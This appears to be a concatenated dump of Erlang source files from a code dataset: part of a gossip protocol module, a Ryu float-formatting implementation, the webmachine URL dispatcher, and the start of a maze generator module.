               ({trigger_lock, cb_module()}, locked | free, state()) -> state().
state_set({Key, SecondaryKey}, Value, State) when is_record(State, state) ->
    % select the tuplelist belonging to the primary key ...
    List = case Key of
               cb_state -> State#state.cb_states;
               cb_status -> State#state.cb_stati;
               cycle -> State#state.cycles;
               exch_data -> State#state.exch_datas;
               reply_peer -> State#state.reply_peers;
               round -> State#state.rounds;
               trigger_group -> State#state.trigger_groups;
               trigger_lock -> State#state.trigger_locks
           end,
    % ... insert or replace the entry for the secondary key ...
    List1 = lists:keystore(SecondaryKey, 1, List, {SecondaryKey, Value}),
    % ... and write the modified tuplelist back into its record field
    case Key of
        cb_state -> State#state{cb_states=List1};
        cb_status -> State#state{cb_stati=List1};
        cycle -> State#state{cycles=List1};
        exch_data -> State#state{exch_datas=List1};
        reply_peer -> State#state{reply_peers=List1};
        round -> State#state{rounds=List1};
        trigger_group -> State#state{trigger_groups=List1};
        trigger_lock -> State#state{trigger_locks=List1}
    end;
state_set(Key, Value, State) when is_record(State, state) ->
    % simple keys map 1:1 to record fields
    case Key of
        cb_modules -> State#state{cb_modules = Value};
        msg_queue -> State#state{msg_queue = Value};
        range -> State#state{range = Value};
        status -> State#state{status = Value};
        trigger_add -> State#state{trigger_add = Value};
        trigger_remove -> State#state{trigger_remove = Value}
    end.
%% @doc Removes all callback module dependent entries from the state, i.e.
%%      the module's entries in the cb_states, cb_stati, cycles, exch_datas,
%%      rounds and trigger_locks tuplelists.
-spec state_remove_cb(cb_module(), state()) -> state().
state_remove_cb(CBModule, State) when is_record(State, state) ->
    Del = fun(TupleList) -> lists:keydelete(CBModule, 1, TupleList) end,
    State#state{cb_states = Del(State#state.cb_states),
                cb_stati = Del(State#state.cb_stati),
                cycles = Del(State#state.cycles),
                exch_datas = Del(State#state.exch_datas),
                rounds = Del(State#state.rounds),
                trigger_locks = Del(State#state.trigger_locks)}.
%% @doc Removes the entry of the given key.
%%      Currently only supports removing the cb_status entry of a callback
%%      module (used e.g. when tombstones are cleaned up).
-spec state_remove(Key::{cb_status, SecondaryKey::cb_module()}, state()) -> state().
state_remove({cb_status, CBModule}, #state{cb_stati=CBStati}=State) when is_record(State, state) ->
    CBStati1 = lists:keydelete(CBModule, 1, CBStati),
    State#state{cb_stati=CBStati1}.
%% @doc Updates an entry with the given update function: reads the current
%%      value, applies UpdateFun to it and stores the result.
%%      For a description of the keys see state_get/2.
-spec state_update(cb_modules, UpdateFun::fun(), state()) -> state();
                  (msg_queue, UpdateFun::fun(), state()) -> state();
                  (range, UpdateFun::fun(), state()) -> state();
                  (status, UpdateFun::fun(), state()) -> state();
                  (trigger_add, UpdateFun::fun(), state()) -> state();
                  (trigger_remove, UpdateFun::fun(), state()) -> state();
                  ({cycle, cb_module()}, UpdateFun::fun(), state()) -> state();
                  ({reply_peer, Ref::pos_integer()}, UpdateFun::fun(), state()) -> state();
                  ({round, cb_module()}, UpdateFun::fun(), state()) -> state();
                  ({trigger_group, TriggerInterval::pos_integer()}, UpdateFun::fun(), state()) -> state();
                  ({cb_state, cb_module()}, UpdateFun::fun(), state()) -> state().
state_update(Key, UpdateFun, State) when is_record(State, state) ->
    OldValue = state_get(Key, State),
    state_set(Key, UpdateFun(OldValue), State).
%% @doc Retrieves and removes the reply peer given by Ref from the state.
%%      Returns {none, State} unchanged if no peer is registered under Ref.
-spec take_reply_peer(Ref::pos_integer(), State::state()) -> {comm:mypid()|none, state()}.
take_reply_peer(Ref, #state{reply_peers=Peers}=State) when is_record(State, state) ->
    case lists:keytake(Ref, 1, Peers) of
        {value, {Ref, Peer}, RemainingPeers} ->
            {Peer, State#state{reply_peers=RemainingPeers}};
        false ->
            {none, State}
    end.
%% @doc Gets all the tombstones from the state of the gossip module,
%%      i.e. the callback modules whose cb_status entry is 'tombstone'.
-spec get_tombstones(State::state()) -> [cb_module()].
get_tombstones(State) ->
    [CBModule || {CBModule, tombstone} <- state_get(cb_stati, State)].
%%------------------------- Message Queue --------------------------%%

%% @doc Adds the given message to the message queue (msg_queue:add/2 creates
%%      the queue if necessary).
-spec msg_queue_add(Msg::message(), State::state()) -> state().
msg_queue_add(Msg, State) ->
    MsgQueue1 = state_get(msg_queue, State),
    MsgQueue2 = msg_queue:add(MsgQueue1, Msg),
    state_set(msg_queue, MsgQueue2, State).
%% @doc Sends the messages from the current message queue and stores a new,
%%      empty message queue in the state.
-spec msg_queue_send(State::state()) -> state().
msg_queue_send(State) ->
    msg_queue:send(state_get(msg_queue, State)),
    state_set(msg_queue, msg_queue:new(), State).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Misc
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%% @doc Provides some debug information for the gossip module (to be added to
%%      the information of the callback modules).
-spec web_debug_info(State::state()) -> [{any(), any()}, ...].
web_debug_info(State) ->
    CBModules = state_get(cb_modules, State),
    Tombstones = get_tombstones(State),
    _KeyValueList =
        [{"behaviour module", ""},
         {"msg_queue_len", length(state_get(msg_queue, State))},
         {"status", state_get(status, State)},
         {"registered modules", to_string(CBModules)},
         {"trigger groups", to_string(state_get(trigger_groups, State))},
         {"cycles", to_string(state_get(cycles, State))},
         {"tombstones", to_string(Tombstones)}
        ].
%% @doc String conversion for sane outputs and debugging.
-spec to_string(list()|state()) -> string().
%% Returns a list as string
to_string(List) when is_list(List) ->
    lists:flatten(io_lib:format("~w", [List]));
%% returns the state as string (comment/uncomment as necessary to control output)
to_string(State) when is_record(State, state) ->
    % every component is bound here; unused ones carry the '_' prefix so the
    % corresponding format lines below can be toggled without further changes
    _CBModules = state_get(cb_modules, State),
    _CBStates = state_get(cb_states, State),
    RawMsgQueue = state_get(msg_queue, State),
    _Range = state_get(range, State),
    _Status = state_get(status, State),
    _TriggerAdd = state_get(trigger_add, State),
    _TriggerGroups = state_get(trigger_groups, State),
    _TriggerLocks = state_get(trigger_locks, State),
    _TriggerRemove = state_get(trigger_remove, State),
    _CBStati = state_get(cb_stati, State),
    _Cycles = state_get(cycles, State),
    _ExchDatas = state_get(exch_datas, State),
    _ReplyPeers = state_get(reply_peers, State),
    _Rounds = state_get(rounds, State),
    % abbreviate queued messages to their tag to keep the output readable
    %% _MsgQueue = RawMsgQueue,
    _MsgQueue = lists:map(fun(Tuple) -> {element(1, Tuple), '...'} end, RawMsgQueue),
    Str =
        io_lib:format("State: ~n", []) ++
        io_lib:format("\tCBModules: ~w~n", [_CBModules]) ++
        io_lib:format("\tMsgQueue: ~w~n", [_MsgQueue]) ++
        io_lib:format("\tRange: ~w~n", [_Range]) ++
        io_lib:format("\tStatus: ~w~n", [_Status]) ++
        io_lib:format("\tTriggerAdd: ~w~n", [_TriggerAdd]) ++
        io_lib:format("\tTriggerRemove: ~w~n", [_TriggerRemove]) ++
        io_lib:format("\tReplyPeers: ~w~n", [_ReplyPeers]) ++
        io_lib:format("\tTriggerGroups: ~w~n", [_TriggerGroups]) ++
        io_lib:format("\tTriggerLocks: ~w~n", [_TriggerLocks]) ++
        io_lib:format("\tCBStati: ~w~n", [_CBStati]) ++
        io_lib:format("\tCycles: ~w~n", [_Cycles]) ++
        io_lib:format("\tRounds: ~w~n", [_Rounds]) ++
        %% io_lib:format("\tExchDatas: ~w~n", [_ExchDatas]) ++
        %% io_lib:format("\tCBStates: ~w~n", [_CBStates]) ++
        io_lib:format("", []),
    lists:flatten(Str).
%% @doc Check the config of the gossip module. <br/>
%%      Calls the check_config functions of the callback modules; succeeds
%%      only if every one of them succeeds (stops at the first failure).
-spec check_config() -> boolean().
check_config() ->
    lists:all(fun({Module, _Args}) -> Module:check_config() end, ?CBMODULES).
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%% Testing and Debugging
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

%% @doc Globally starts a gossip task identified by CBModule. <br/>
%%      Args is passed to the init function of the callback module. <br/>
%%      CBModule is either the name of a callback module (a fresh instance id
%%      is generated) or a name-instance_id tuple. The request is distributed
%%      to all nodes via bulkowner.
-spec start_gossip_task(GossipTask, Args) -> ok when
    is_subtype(GossipTask, cb_module_name() | cb_module()),
    is_subtype(Args, list(proplists:property())).
start_gossip_task(ModuleName, Args) when is_atom(ModuleName) ->
    Id = uid:get_global_uid(),
    start_gossip_task({ModuleName, Id}, Args);
start_gossip_task({ModuleName, Id}, Args) when is_atom(ModuleName) ->
    Msg = {?send_to_group_member, gossip,
           {start_gossip_task, {ModuleName, Id}, Args}},
    bulkowner:issue_bulk_owner(uid:get_global_uid(), intervals:all(), Msg).
%% @doc Globally stops a gossip task.
%%      The request is distributed to all nodes via bulkowner.
-spec stop_gossip_task(CBModule::cb_module()) -> ok.
stop_gossip_task(CBModule) ->
    Msg = {?send_to_group_member, gossip, {stop_gossip_task, CBModule}},
    bulkowner:issue_bulk_owner(uid:get_global_uid(), intervals:all(), Msg).
%% @doc Hack to be able to suppress warnings when testing via config:write():
%%      reads the configured log level for warnings, falling back to 'info'
%%      when no value is configured.
-spec warn() -> log:log_level().
warn() ->
    ConfiguredLevel = config:read(gossip_log_level_warn),
    case ConfiguredLevel of
        failed -> info;
        _ -> ConfiguredLevel
    end.
%% @doc Hack to be able to suppress errors when testing via config:write():
%%      reads the configured log level for errors, falling back to 'warn'
%%      when no value is configured.
-compile({nowarn_unused_function, {error, 0}}).
-spec error() -> log:log_level().
error() ->
    ConfiguredLevel = config:read(gossip_log_level_error),
    case ConfiguredLevel of
        failed -> warn;
        _ -> ConfiguredLevel
    end.
%% @doc Value creator for type_check_SUITE: produces a valid cb_module_name().
-spec tester_create_cb_module_names(1) -> cb_module_name().
tester_create_cb_module_names(1) ->
    gossip_load.
%% @doc Argument feeder for tester calls of init_gossip_task/3.
-compile({nowarn_unused_function, {init_gossip_task_feeder, 3}}).
-spec init_gossip_task_feeder(cb_module(), NoOfBuckets::gossip_load:histogram_size(), state())
        -> {cb_module(), list(), state()}.
init_gossip_task_feeder(CBModule, NoOfBuckets, State) ->
    %% note: gossip_load (the only supported cb_module for now) requires an
    %% integer NoOfBuckets parameter
    %% (other modules may have different parameters)
    {CBModule, [NoOfBuckets], State}.
%%%-------------------------------------------------------------------
%% @doc Implements the Ryu algorithm for f64 binaries
%%
%% This has been extracted from OTP 24, and is mostly present here as a reference implementation.
%% @end
%%%-------------------------------------------------------------------
-module(ken_ryu_f64).
-export([fwrite_g/1]).
%% Returns a correctly rounded string that converts to Float when
%% read back with list_to_float/1.
%%
%% When abs(Float) < float(1 bsl 53) the shortest such string is
%% returned, and otherwise the shortest such string using scientific
%% notation is returned. That is, scientific notation is used if and
%% only if scientific notation results in a shorter string than
%% normal notation when abs(Float) < float(1 bsl 53), and scientific
%% notation is used unconditionally if abs(Float) >= float(1 bsl
%% 53). See comment in insert_decimal/2 for an explanation for why
%% float(1 bsl 53) is chosen as cutoff point.
%%
%% The algorithm that is used to find the decimal number that is
%% represented by the returned String is described in "Ryu: Fast
%% Float-to-String Conversion" in Proceedings of 39th ACM SIGPLAN
%% Conference on Programming Language Design and Implementation.
%% https://dl.acm.org/doi/pdf/10.1145/3192366.3192369
-spec fwrite_g(binary()) -> iodata().
fwrite_g(Float) ->
    case sign_mantissa_exponent(Float) of
        % positive and negative zero are special-cased
        {0, 0, 0} ->
            "0.0";
        {1, 0, 0} ->
            "-0.0";
        % biased exponent 2047 (infinity/NaN) has no clause and crashes
        % with function_clause
        {S, M, E} when E < 2047 ->
            {Place, Digits} =
                case is_small_int(M, E) of
                    {int, M1, E1} ->
                        % integers in [1, 2^53) take the fast path
                        compute_shortest_int(M1, E1);
                    not_int ->
                        fwrite_g_1(M, E)
                end,
            % insert_decimal/3 and insert_minus/2 are defined later in this
            % module (outside this excerpt)
            DigitList = insert_decimal(Place, Digits, Float),
            insert_minus(S, DigitList)
    end.
%% 2^52: the implicit leading bit of a normalised f64 mantissa.
-define(BIG_POW, (1 bsl 52)).
%% f64 exponent bias (1023) plus mantissa width (52).
-define(DECODE_CORRECTION, 1075).
%% @doc Splits an IEEE-754 double, given as a 64-bit binary, into its
%%      sign bit, mantissa and raw (biased) exponent fields.
sign_mantissa_exponent(<<Sign:1, BiasedExp:11, Mantissa:52>>) ->
    {Sign, Mantissa, BiasedExp}.
%% @doc Tests whether the float given by mantissa M and biased exponent E is
%%      an integer in the range [1, 2^53). Returns {int, Value, 0} with the
%%      integer value of the float, or not_int otherwise.
is_small_int(M, E) ->
    % add the implicit leading bit and unbias the exponent
    M2 = ?BIG_POW bor M,
    E2 = E - ?DECODE_CORRECTION,
    case E2 > 0 orelse E2 < -52 of
        true ->
            %% f = m2 * 2^e2 >= 2^53 is an integer.
            %% Ignore this case for now.
            %% or f < 1
            not_int;
        _ ->
            %% Since 2^52 <= m2 < 2^53 and 0 <= -e2 <= 52: 1 <= f = m2 / 2^-e2 < 2^53.
            %% Test if the lower -e2 bits of the significand are 0, i.e. whether the fraction is 0.
            Mask = (1 bsl -E2) - 1,
            Fraction = M2 band Mask,
            case Fraction of
                0 ->
                    %% f is an integer in the range [1, 2^53).
                    %% Note: mantissa might contain trailing (decimal) 0's.
                    {int, M2 bsr -E2, 0};
                _ ->
                    not_int
            end
    end.
%% @doc For small integers in the range [1, 2^53), the mantissa might contain
%%      trailing (decimal) zeros: strips them, counting each stripped zero
%%      into the decimal exponent, and renders the remaining digits.
compute_shortest_int(Mantissa, DecExp) when Mantissa rem 10 =:= 0 ->
    compute_shortest_int(Mantissa div 10, DecExp + 1);
compute_shortest_int(Mantissa, DecExp) ->
    {DecExp, integer_to_binary(Mantissa)}.
%% @doc Ryu core for the general (non-small-int) case: decodes the float,
%%      derives the decimal digits D1 and the decimal exponent of the
%%      shortest correctly rounded representation.
fwrite_g_1(M, E) ->
    {Mf, Ef} = decode(M, E),
    % mmshift widens the lower bound for the smallest normal mantissa
    Shift = mmshift(M, E),
    % scale by 4 (2 bits); decode/2 already subtracted 2 from the exponent
    Mv = 4 * Mf,
    {Q, Vm, Vr, Vp, E10} = convert_to_decimal(Ef, Mv, Shift),
    % even mantissa: round-to-even allows accepting the interval bounds
    Accept = M rem 2 == 0,
    {VmIsTrailingZero, VrIsTrailingZero, Vp1} = bounds(Mv, Q, Vp, Accept, Ef, Shift),
    {D1, E1} = compute_shortest(Vm, Vr, Vp1, VmIsTrailingZero, VrIsTrailingZero, Accept),
    {E1 + E10, integer_to_binary(D1)}.
decode(Mantissa, 0) ->
{Mantissa, 1 - ?DECODE_CORRECTION - 2};
decode(Mantissa, Exponent) ->
{Mantissa + ?BIG_POW, Exponent - ?DECODE_CORRECTION - 2}.
mmshift(0, E) when E > 1 ->
0;
mmshift(_M, _E) ->
1.
convert_to_decimal(E2, Mv, Shift) when E2 >= 0 ->
Q = max(0, ((E2 * 78913) bsr 18) - 1),
Mul = ken_ryu_table_f64:inv_value(Q),
K = ken_ryu_table_f64:pow5_inv_bitcount() + pow5bits(Q) - 1,
I = -E2 + Q + K,
{Vm, Vr, Vp} = mulShiftAll(Mv, Shift, I, Mul),
{Q, Vm, Vr, Vp, Q};
convert_to_decimal(E2, Mv, Shift) when E2 < 0 ->
Q = max(0, ((-E2 * 732923) bsr 20) - 1),
I = -E2 - Q,
K = pow5bits(I) - ken_ryu_table_f64:pow5_bitcount(),
From_file = ken_ryu_table_f64:value(I),
J = Q - K,
{Vm, Vr, Vp} = mulShiftAll(Mv, Shift, J, From_file),
E10 = E2 + Q,
{Q, Vm, Vr, Vp, E10}.
pow5bits(E) ->
((E * 1217359) bsr 19) + 1.
mulShiftAll(Mv, Shift, J, Mul) ->
A = mulShift64(Mv - 1 - Shift, Mul, J),
B = mulShift64(Mv, Mul, J),
C = mulShift64(Mv + 2, Mul, J),
{A, B, C}.
mulShift64(M, Mul, J) ->
(M * Mul) bsr J.
bounds(Mv, Q, Vp, _Accept, E2, _Shift) when E2 >= 0, Q =< 21, Mv rem 5 =:= 0 ->
{false, multipleOfPowerOf5(Mv, Q), Vp};
bounds(Mv, Q, Vp, true, E2, Shift) when E2 >= 0, Q =< 21 ->
{multipleOfPowerOf5(Mv - 1 - Shift, Q), false, Vp};
bounds(Mv, Q, Vp, _Accept, E2, _Shift) when E2 >= 0, Q =< 21 ->
{false, false, Vp - vpmodifier(multipleOfPowerOf5(Mv + 2, Q))};
bounds(_Mv, Q, Vp, true, E2, Shift) when E2 < 0, Q =< 1 ->
{Shift =:= 1, true, Vp};
bounds(_Mv, Q, Vp, false, E2, _Shift) when E2 < 0, Q =< 1 ->
{false, true, Vp - 1};
bounds(Mv, Q, Vp, _Accept, E2, _Shift) when E2 < 0, Q < 63 ->
{false, Mv band ((1 bsl Q) - 1) =:= 0, Vp};
bounds(_Mv, _Q, Vp, _Accept, _E2, _Shift) ->
{false, false, Vp}.
multipleOfPowerOf5(Value, Q) ->
pow5factor(Value) >= Q.
pow5factor(Val) ->
pow5factor(Val div 5, 0).
pow5factor(Val, Count) when Val rem 5 /= 0 ->
Count;
pow5factor(Val, Count) ->
pow5factor(Val div 5, Count + 1).
vpmodifier(true) ->
1;
vpmodifier(false) ->
0.
compute_shortest(Vm, Vr, Vp, false, false, _Accept) ->
{Vm1, Vr1, Removed, RoundUp} = general_case(Vm, Vr, Vp, 0, false),
Output = Vr1 + handle_normal_output_mod(Vr1, Vm1, RoundUp),
{Output, Removed};
compute_shortest(Vm, Vr, Vp, VmIsTrailingZero, VrIsTrailingZero, Accept) ->
{Vm1, Vr1, Removed, LastRemovedDigit} =
handle_trailing_zeros(Vm, Vr, Vp, VmIsTrailingZero, VrIsTrailingZero, 0, 0),
Output =
Vr1 + handle_zero_output_mod(Vr1, Vm1, Accept, VmIsTrailingZero, LastRemovedDigit),
{Output, Removed}.
general_case(Vm, Vr, Vp, Removed, RoundUp) when Vp div 100 =< Vm div 100 ->
general_case_10(Vm, Vr, Vp, Removed, RoundUp);
general_case(Vm, Vr, Vp, Removed, _RU) ->
VmD100 = Vm div 100,
VrD100 = Vr div 100,
VpD100 = Vp div 100,
RoundUp = Vr rem 100 >= 50,
general_case_10(VmD100, VrD100, VpD100, 2 + Removed, RoundUp).
general_case_10(Vm, Vr, Vp, Removed, RoundUp) when Vp div 10 =< Vm div 10 ->
{Vm, Vr, Removed, RoundUp};
general_case_10(Vm, Vr, Vp, Removed, _RU) ->
VmD10 = Vm div 10,
VrD10 = Vr div 10,
VpD10 = Vp div 10,
RoundUp = Vr rem 10 >= 5,
general_case_10(VmD10, VrD10, VpD10, 1 + Removed, RoundUp).
handle_normal_output_mod(Vr, Vm, RoundUp) when (Vm =:= Vr) or RoundUp ->
1;
handle_normal_output_mod(_Vr, _Vm, _RoundUp) ->
0.
handle_trailing_zeros(Vm, Vr, Vp, VmTZ, VrTZ, Removed, LastRemovedDigit) when
(Vp div 10) =< (Vm div 10)
->
vmIsTrailingZero(Vm, Vr, Vp, VmTZ, VrTZ, Removed, LastRemovedDigit);
handle_trailing_zeros(
Vm,
Vr,
Vp,
VmIsTrailingZero,
VrIsTrailingZero,
Removed,
LastRemovedDigit
) ->
VmTZ = VmIsTrailingZero and ((Vm rem 10) =:= 0),
VrTZ = VrIsTrailingZero and (LastRemovedDigit =:= 0),
handle_trailing_zeros(
Vm div 10,
Vr div 10,
Vp div 10,
VmTZ,
VrTZ,
1 + Removed,
Vr rem 10
).
vmIsTrailingZero(Vm, Vr, _Vp, false = _VmTZ, VrTZ, Removed, LastRemovedDigit) ->
handle_50_dotdot_0(Vm, Vr, VrTZ, Removed, LastRemovedDigit);
vmIsTrailingZero(Vm, Vr, _Vp, _VmTZ, VrTZ, Removed, LastRemovedDigit) when
(Vm rem 10) /= 0
->
handle_50_dotdot_0(Vm, Vr, VrTZ, Removed, LastRemovedDigit);
vmIsTrailingZero(Vm, Vr, Vp, VmTZ, VrTZ, Removed, LastRemovedDigit) ->
vmIsTrailingZero(
Vm div 10,
Vr div 10,
Vp div 10,
VmTZ,
LastRemovedDigit == 0 andalso VrTZ,
1 + Removed,
Vr rem 10
).
handle_50_dotdot_0(Vm, Vr, true, Removed, 5) when (Vr rem 2) =:= 0 ->
{Vm, Vr, Removed, 4};
handle_50_dotdot_0(Vm, Vr, _VrTZ, Removed, LastRemovedDigit) ->
{Vm, Vr, Removed, LastRemovedDigit}.
handle_zero_output_mod(_Vr, _Vm, _Accept, _VmTZ, LastRemovedDigit) when
LastRemovedDigit >= 5
->
1;
handle_zero_output_mod(Vr, Vm, Accept, VmTZ, _LastRemovedDigit) when
Vr =:= Vm, ((not Accept) or not (VmTZ))
->
1;
handle_zero_output_mod(_Vr, _Vm, _Accept, _VmTZ, _LastRemovedDigit) ->
0.
insert_decimal(Place, S, F) ->
<<Float/float>> = F,
L = byte_size(S),
Exp = Place + L - 1,
ExpL = integer_to_binary(Exp),
ExpCost = byte_size(ExpL) + 2,
if
Place < 0 ->
if
Exp >= 0 ->
S0_size = L + Place,
<<S0:S0_size/binary, S1/binary>> = S,
[S0, $., S1];
2 - Place - L =< ExpCost ->
["0.", binary:copy(<<$0>>, -Place - L), S];
true ->
insert_exp(ExpL, S)
end;
true ->
Dot =
if
L =:= 1 ->
1;
true ->
0
end,
%% All integers in the range [-2^53, 2^53] can
if
%% be stored without loss of precision in an
%% IEEE 754 64-bit double but 2^53+1 cannot be
%% stored in an IEEE 754 64-bit double without
%% loss of precision (float((1 bsl 53)+1) =:=
%% float(1 bsl 53)). It thus makes sense to
%% show floats that are >= 2^53 or <= -2^53 in
%% scientific notation to indicate that the
%% number is so large that there could be loss
%% in precion when adding or subtracting 1.
%%
%% https://stackoverflow.com/questions/1848700/biggest-integer-that-can-be-stored-in-a-double?answertab=votes#tab-top
ExpCost + Dot >= Place + 2 andalso abs(Float) < float(1 bsl 53) ->
[S, binary:copy(<<$0>>, Place), ".0"];
true ->
insert_exp(ExpL, S)
end
end.
insert_exp(ExpL, <<C:1/binary>>) ->
[C, ".0e", ExpL];
insert_exp(ExpL, <<C:1/binary, S/binary>>) ->
[C, $., S, $e, ExpL].
insert_minus(0, Digits) ->
Digits;
insert_minus(1, Digits) ->
[$-, Digits]. | src/ken_ryu_f64.erl | 0.719581 | 0.626952 | ken_ryu_f64.erl | starcoder |
%% @author <NAME> <<EMAIL>>
%% @author <NAME> <<EMAIL>>
%% @copyright 2007-2009 Basho Technologies
%%
%% Licensed under the Apache License, Version 2.0 (the "License");
%% you may not use this file except in compliance with the License.
%% You may obtain a copy of the License at
%%
%% http://www.apache.org/licenses/LICENSE-2.0
%%
%% Unless required by applicable law or agreed to in writing, software
%% distributed under the License is distributed on an "AS IS" BASIS,
%% WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
%% See the License for the specific language governing permissions and
%% limitations under the License.
%% @doc Module for URL-dispatch by pattern matching.
-module(webmachine_dispatcher).
-author('<NAME> <<EMAIL>>').
-author('<NAME> <<EMAIL>>').
-author('<NAME> <<EMAIL>>').
-export([dispatch/2, dispatch/3]).
-define(SEPARATOR, $\/).
-define(MATCH_ALL, '*').
%% @spec dispatch(Path::string(), DispatchList::[matchterm()]) ->
%% dispterm() | dispfail()
%% @doc Interface for URL dispatching.
%% See also http://bitbucket.org/justin/webmachine/wiki/DispatchConfiguration
dispatch(PathAsString, DispatchList) ->
dispatch([], PathAsString, DispatchList).
%% @spec dispatch(Host::string(), Path::string(),
%% DispatchList::[matchterm()]) ->
%% dispterm() | dispfail()
%% @doc Interface for URL dispatching.
%% See also http://bitbucket.org/justin/webmachine/wiki/DispatchConfiguration
dispatch(HostAsString, PathAsString, DispatchList) ->
Path = string:tokens(PathAsString, [?SEPARATOR]),
% URIs that end with a trailing slash are implicitly one token
% "deeper" than we otherwise might think as we are "inside"
% a directory named by the last token.
ExtraDepth = case lists:last(PathAsString) == ?SEPARATOR of
true -> 1;
_ -> 0
end,
{Host, Port} = split_host_port(HostAsString),
try_host_binding(DispatchList, lists:reverse(Host), Port,
Path, ExtraDepth).
split_host_port(HostAsString) ->
case string:tokens(HostAsString, ":") of
[HostPart, PortPart] ->
{split_host(HostPart), list_to_integer(PortPart)};
[HostPart] ->
{split_host(HostPart), 80};
[] ->
%% no host header
{[], 80}
end.
split_host(HostAsString) ->
string:tokens(HostAsString, ".").
%% @type matchterm() = hostmatchterm() | pathmatchterm().
% The dispatch configuration is a list of these terms, and the
% first one whose host and path terms match the input is used.
% Using a pathmatchterm() here is equivalent to using a hostmatchterm()
% of the form {{['*'],'*'}, [pathmatchterm()]}.
%% @type hostmatchterm() = {hostmatch(), [pathmatchterm()]}.
% The dispatch configuration contains a list of these terms, and the
% first one whose host and one pathmatchterm match is used.
%% @type hostmatch() = [hostterm()] | {[hostterm()], portterm()}.
% A host header (Host, X-Forwarded-For, etc.) will be matched against
% this term. Using a raws [hostterm()] list is equivalent to using
% {[hostterm()], '*'}.
%% @type hostterm() = '*' | string() | atom().
% A list of hostterms is matched against a '.'-separated hostname.
% The '*' hosterm matches all remaining tokens, and is only allowed at
% the head of the list.
% A string hostterm will match a token of exactly the same string.
% Any atom hostterm other than '*' will match any token and will
% create a binding in the result if a complete match occurs.
%% @type portterm() = '*' | integer() | atom().
% A portterm is matched against the integer port after any ':' in
% the hostname, or 80 if no port is found.
% The '*' portterm patches any port
% An integer portterm will match a port of exactly the same integer.
% Any atom portterm other than '*' will match any port and will
% create a binding in the result if a complete match occurs.
%% @type pathmatchterm() = {[pathterm()], matchmod(), matchopts()}.
% The dispatch configuration contains a list of these terms, and the
% first one whose list of pathterms matches the input path is used.
%% @type pathterm() = '*' | string() | atom().
% A list of pathterms is matched against a '/'-separated input path.
% The '*' pathterm matches all remaining tokens.
% A string pathterm will match a token of exactly the same string.
% Any atom pathterm other than '*' will match any token and will
% create a binding in the result if a complete match occurs.
%% @type matchmod() = atom().
% This atom, if present in a successful matchterm, will appear in
% the resulting dispterm. In Webmachine this is used to name the
% controller module that will handle the matching request.
%% @type matchopts() = [term()].
% This term, if present in a successful matchterm, will appear in
% the resulting dispterm. In Webmachine this is used to provide
% arguments to the controller module handling the matching request.
%% @type dispterm() = {matchmod(), matchopts(), pathtokens(),
%% bindings(), approot(), stringpath()}.
%% @type pathtokens() = [pathtoken()].
% This is the list of tokens matched by a trailing '*' pathterm.
%% @type pathtoken() = string().
%% @type bindings() = [{bindingterm(),pathtoken()}].
% This is a proplist of bindings indicated by atom terms in the
% matching spec, bound to the matching tokens in the request path.
%% @type approot() = string().
%% @type stringpath() = string().
% This is the path portion matched by a trailing '*' pathterm.
%% @type dispfail() = {no_dispatch_match, pathtokens()}.
try_host_binding([], Host, Port, Path, _Depth) ->
{no_dispatch_match, {Host, Port}, Path};
try_host_binding([Dispatch|Rest], Host, Port, Path, Depth) ->
{{HostSpec,PortSpec},PathSpec} =
case Dispatch of
{{H,P},S} -> {{H,P},S};
{H,S} -> {{H,?MATCH_ALL},S};
S -> {{[?MATCH_ALL],?MATCH_ALL},[S]}
end,
case bind_port(PortSpec, Port, []) of
{ok, PortBindings} ->
case bind(lists:reverse(HostSpec), Host, PortBindings, 0) of
{ok, HostRemainder, HostBindings, _} ->
case try_path_binding(PathSpec, Path, HostBindings, Depth) of
{Mod, Props, PathRemainder, PathBindings,
AppRoot, StringPath} ->
{Mod, Props, HostRemainder, Port, PathRemainder,
PathBindings, AppRoot, StringPath};
{no_dispatch_match, _} ->
try_host_binding(Rest, Host, Port, Path, Depth)
end;
fail ->
try_host_binding(Rest, Host, Port, Path, Depth)
end;
fail ->
try_host_binding(Rest, Host, Port, Path, Depth)
end.
bind_port(Port, Port, Bindings) -> {ok, Bindings};
bind_port(?MATCH_ALL, _Port, Bindings) -> {ok, Bindings};
bind_port(PortAtom, Port, Bindings) when is_atom(PortAtom) ->
{ok, [{PortAtom, Port}|Bindings]};
bind_port(_, _, _) -> fail.
try_path_binding([], PathTokens, _, _) ->
{no_dispatch_match, PathTokens};
try_path_binding([{PathSchema, Mod, Props}|Rest], PathTokens,
Bindings, ExtraDepth) ->
case bind(PathSchema, PathTokens, Bindings, 0) of
{ok, Remainder, NewBindings, Depth} ->
{Mod, Props, Remainder, NewBindings,
calculate_app_root(Depth + ExtraDepth), reconstitute(Remainder)};
fail ->
try_path_binding(Rest, PathTokens, Bindings, ExtraDepth)
end.
bind([], [], Bindings, Depth) ->
{ok, [], Bindings, Depth};
bind([?MATCH_ALL], Rest, Bindings, Depth) when is_list(Rest) ->
{ok, Rest, Bindings, Depth + length(Rest)};
bind(_, [], _, _) ->
fail;
bind([Token|RestToken],[Match|RestMatch],Bindings,Depth) when is_atom(Token) ->
bind(RestToken, RestMatch, [{Token, Match}|Bindings], Depth + 1);
bind([Token|RestToken], [Token|RestMatch], Bindings, Depth) ->
bind(RestToken, RestMatch, Bindings, Depth + 1);
bind(_, _, _, _) ->
fail.
reconstitute([]) -> "";
reconstitute(UnmatchedTokens) -> string:join(UnmatchedTokens, [?SEPARATOR]).
calculate_app_root(1) -> ".";
calculate_app_root(N) when N > 1 ->
string:join(lists:duplicate(N, ".."), [?SEPARATOR]). | src/webmachine_dispatcher.erl | 0.512937 | 0.40439 | webmachine_dispatcher.erl | starcoder |
%%%-------------------------------------------------------------------
%%% @author grzeg
%%% @copyright (C) 2020, <COMPANY>
%%% @doc
%%%
%%% @end
%%% Created : 25. maj 2020 21:10
%%%-------------------------------------------------------------------
-module(maze_generator).
-author("grzeg").
%% API
-export([createMaze/2, step/1]).
-record(maze, {height, width, passages}).
%%%===================================================================
%%% API
%%%===================================================================
%%--------------------------------------------------------------------
